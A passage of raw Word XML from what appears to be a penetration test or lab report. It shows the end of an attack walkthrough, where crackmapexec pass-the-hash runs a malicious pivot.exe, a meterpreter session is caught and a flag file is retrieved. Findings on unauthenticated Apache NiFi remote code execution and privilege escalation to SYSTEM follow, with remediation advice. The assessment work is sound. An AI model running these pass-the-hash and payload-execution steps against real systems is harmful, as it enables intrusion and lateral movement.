            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5BFF14" w14:textId="77777777" w:rsidR="00CA70E3" w:rsidRDefault="00CA70E3" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E81BA77" w14:textId="31DB5EF8" w:rsidR="005D0252" w:rsidRPr="005D0252" w:rsidRDefault="005D0252" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Step 14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to execute the malicious </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pivot.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3CBE2B" w14:textId="6D68D517" w:rsidR="005D0252" w:rsidRPr="00A95C5E" w:rsidRDefault="005D0252" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> –local-auth -u itwk04admin -H “&lt;NTLM hash&gt;” -X “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.\pivot.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00A95C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>” &lt;TARGET IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFCCC4A" w14:textId="1CAD81D1" w:rsidR="005520A6" w:rsidRDefault="00CA70E3" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4759DE0E" wp14:editId="130AE972">
            <wp:extent cx="8229600" cy="1459230"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="606076700" name="Picture 1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6700" name="Picture 14" descr="A computer screen with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0" cy="1459230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3E7720" w14:textId="50C7E4AF" w:rsidR="00C10B10" w:rsidRPr="00C10B10" w:rsidRDefault="00C10B10" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The listener picks up a meterpreter session. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10B10">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Highlighted below is the user </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10B10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ITWK04\itwk04admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10B10">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> after running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C10B10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B4B13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD7E7D0" w14:textId="77777777" w:rsidR="00C10B10" w:rsidRDefault="00C10B10" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="461552D4" w14:textId="6CE8FF73" w:rsidR="00C10B10" w:rsidRDefault="00C10B10" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="419CE19A" wp14:editId="6843FB41">
            <wp:extent cx="8229600" cy="1581785"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="274181994"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1994" name="Picture 17" descr="A black screen with whit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600" cy="1581785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6401812D" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A8F3FB7" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D7B2415" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F15831" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6B8A73" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC00942" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D279838" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05BA1C6F" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BEF481C" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427F1D45" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A86557" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B033C5" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44EB1FDF" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DDA3920" w14:textId="5EEDE013" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The flag is located at </w:t>
      </w:r>
      <w:r w:rsidRPr="007B4B13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C:\Users\itwk04admin\Desktop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r w:rsidRPr="007B4B13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F5E9F9" w14:textId="77777777" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="126D9544" w14:textId="345E3547" w:rsidR="007B4B13" w:rsidRDefault="007B4B13" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D2EBDBC" wp14:editId="58239625">
            <wp:extent cx="8229600" cy="3770630"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="5484581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8140"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3770630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A45365D" w14:textId="77777777" w:rsidR="00161AAE" w:rsidRDefault="00161AAE" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED456A1" w14:textId="77777777" w:rsidR="00161AAE" w:rsidRDefault="00161AAE" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4470AC48" w14:textId="77777777" w:rsidR="00161AAE" w:rsidRDefault="00161AAE" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F445D4" w14:textId="77777777" w:rsidR="00161AAE" w:rsidRPr="00F94FC9" w:rsidRDefault="00161AAE" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1160BE47" w14:textId="301993D2" w:rsidR="0180BCFD" w:rsidRDefault="0180BCFD" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc146821157"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Technical Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="52F5499B" w14:textId="218BA471" w:rsidR="0180BCFD" w:rsidRDefault="0180BCFD" w:rsidP="00A74A75">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD7A272" w14:textId="18D797A0" w:rsidR="00123DCA" w:rsidRPr="00782E20" w:rsidRDefault="00161AAE" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc146821158"/>
      <w:r>
        <w:t xml:space="preserve">Unpatched </w:t>
      </w:r>
      <w:r w:rsidR="00797E47">
        <w:t xml:space="preserve">Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00797E47">
        <w:t>NiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00797E47">
        <w:t xml:space="preserve"> API running on </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="00797E47" w:rsidRPr="00FB11C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.203.225:8080</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00797E47">
        <w:t xml:space="preserve"> leading to Remote Code Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="76262C90" w14:textId="77777777" w:rsidR="00782E20" w:rsidRPr="00782E20" w:rsidRDefault="00782E20" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14BC6420" w14:textId="77777777" w:rsidR="00123DCA" w:rsidRDefault="0180BCFD" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc146821159"/>
      <w:r w:rsidRPr="0180BCFD">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="0AEA35A5" w14:textId="16686AF7" w:rsidR="006956B2" w:rsidRDefault="00797E47" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The assessed IP in scope (192.168</w:t>
      </w:r>
      <w:r w:rsidR="3EE847B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>.203.224)</w:t>
      </w:r>
      <w:r w:rsidR="009C714D">
        <w:t xml:space="preserve"> hosts an unpatched Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009C714D">
        <w:t>NiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009C714D">
        <w:t xml:space="preserve"> instance accessible at </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="009C714D" w:rsidRPr="00FB11C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.203.225:8080</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009C714D">
        <w:t xml:space="preserve">. This vulnerability does not require any authentication or special privileges for exploitation. The situation poses significant security concerns as it exposes the system to potential threats. Specifically, the absence of updates and patches makes the system susceptible to Remote Code Execution, a severe security risk. This issue is critical due to its potential to allow unauthorized control over the system. It is crucial to promptly address this vulnerability by applying necessary security measures and patches to safeguard the Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009C714D">
        <w:t>NiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009C714D">
        <w:t xml:space="preserve"> installation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFB4DB2" w14:textId="6F468ACB" w:rsidR="006D3C73" w:rsidRDefault="006D3C73" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006D3C73">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Check this page for more details on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3C73">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> affecting Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3C73">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D3C73">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00FB11C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>https://nifi.apache.org/security.htm</w:t>
        </w:r>
        <w:r w:rsidRPr="00FB11C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48238903" w14:textId="77777777" w:rsidR="007356F4" w:rsidRDefault="007356F4" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE8F101" w14:textId="59BA0B3A" w:rsidR="00123DCA" w:rsidRDefault="0180BCFD" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc146821160"/>
      <w:r w:rsidRPr="0180BCFD">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0C5CC495" w14:textId="5632E880" w:rsidR="007356F4" w:rsidRDefault="00B534EB" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The impact of this vulnerability is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B534EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CRITICAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003678CA">
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it gives an unauthenticated access to the malicious actor. The vulnerability’s exploitability is significantly elevated by the widespread availability of readily accessible automated exploits on the internet, amplifying its level of danger</w:t>
      </w:r>
      <w:r w:rsidR="00707891">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002B529D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00373608">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00707891">
        <w:t>onsequently, this creates an urgent and pressing security concern, emphasizing the critical need for immediate attention and remediation to mitigate the risks associated with this security flaw.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFFBC04" w14:textId="77777777" w:rsidR="009A2789" w:rsidRDefault="009A2789" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C440F3E" w14:textId="77777777" w:rsidR="00707891" w:rsidRDefault="00707891" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67094FF1" w14:textId="48186E16" w:rsidR="00123DCA" w:rsidRDefault="0180BCFD" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc146821161"/>
      <w:r w:rsidRPr="0180BCFD">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="3E799CD4" w14:textId="20D6A580" w:rsidR="3EE847B1" w:rsidRDefault="00834DA1" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To mitigate this security issue, we recommend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C29E3" w14:textId="2952C513" w:rsidR="00834DA1" w:rsidRDefault="00834DA1" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Applying the latest patch or updating the Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the latest version available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0328CC" w14:textId="0BEEDC59" w:rsidR="00834DA1" w:rsidRDefault="00834DA1" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Implement strong access controls and authentication mechanisms for systems and applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D418A" w14:textId="7AC1C1C2" w:rsidR="00C70ED3" w:rsidRDefault="00834DA1" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Implement network segmentation to isolate critical systems from less secure areas of the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FB5CB4" w14:textId="77777777" w:rsidR="004B7676" w:rsidRDefault="004B7676" w:rsidP="004B7676">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6DB2C5" w14:textId="77777777" w:rsidR="00FF68E7" w:rsidRDefault="00FF68E7" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc146821162"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Technical Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="77701DA2" w14:textId="77777777" w:rsidR="00FF68E7" w:rsidRDefault="00FF68E7" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232DC98A" w14:textId="1EA27C5D" w:rsidR="00FF68E7" w:rsidRPr="00782E20" w:rsidRDefault="00C70AEB" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc146821163"/>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidR="0070351F">
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0070351F">
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r>
        <w:t>user ‘itwk03\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>alex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ to NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E996603" w14:textId="77777777" w:rsidR="00FF68E7" w:rsidRPr="00782E20" w:rsidRDefault="00FF68E7" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEB4161" w14:textId="77777777" w:rsidR="00FF68E7" w:rsidRDefault="00FF68E7" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc146821164"/>
      <w:r w:rsidRPr="0180BCFD">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="5F879B06" w14:textId="4E50B6A5" w:rsidR="00FF68E7" w:rsidRDefault="00146A0A" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>After getting the initial access as ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="005520A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>itwk03\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005520A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">’, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the user has a privilege escalation vulnerability due to processes running with </w:t>
      </w:r>
      <w:r w:rsidRPr="00F7289F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ADMIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> privileges.</w:t>
      </w:r>
      <w:r w:rsidR="00F7289F">
        <w:t xml:space="preserve"> The vulnerability was discovered through a meterpreter session which allowed us to get </w:t>
      </w:r>
      <w:r w:rsidR="00F7289F" w:rsidRPr="00F7289F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidR="00F7289F">
        <w:t xml:space="preserve"> access. The ‘system’ privileged processes allow users to execute actions requiring ADMIN rights. Malicious actors can exploit these processes to attain NT AUTHORITY\SYSTEM privileges, enabling them to pivot to other services or machines.</w:t>
      </w:r>
      <w:r w:rsidR="003457E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70531D1A" w14:textId="4F95F4E0" w:rsidR="00FF68E7" w:rsidRDefault="00FF68E7" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D3C73">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
